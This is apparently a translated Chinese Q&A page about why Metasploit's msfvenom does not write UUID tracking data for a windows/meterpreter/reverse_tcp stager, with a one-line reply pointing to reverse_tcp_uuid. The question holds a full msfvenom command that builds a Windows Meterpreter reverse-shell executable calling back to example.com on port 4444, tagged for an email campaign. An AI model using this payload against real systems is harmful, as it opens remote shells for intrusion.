0

我正在尝试创建带有 UUID 跟踪的meterpreter/reverse_tcp stager ,但没有创建~/.msf4/payloads.json 。

这是 msfvenom 命令:

msfvenom --platform windows -a x86 -p windows/meterpreter/reverse_tcp LHOST=example.com LPORT=4444 PayloadUUIDTracking=true PayloadUUIDName=EmailCampaign20150101 -f exe -o payload.exe

但是当我将有效负载更改为Meterpreter/reverse_https时,一切都按我的预期工作。

这是什么意思?reverse_tcp stagers 不支持 UUID?因为当我查看Meterpreter/reverse_tcp stager 的 ASM 代码时,它包含了 UUID 何时发送的部分。https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/payload/windows/reverse_tcp.rb#L179

谢谢你的建议。

4

1 回答 1

0

reverse_tcp_uuid 有效负载和处理程序支持 UUID 跟踪。

于 2015-09-14T10:14:46.653 回答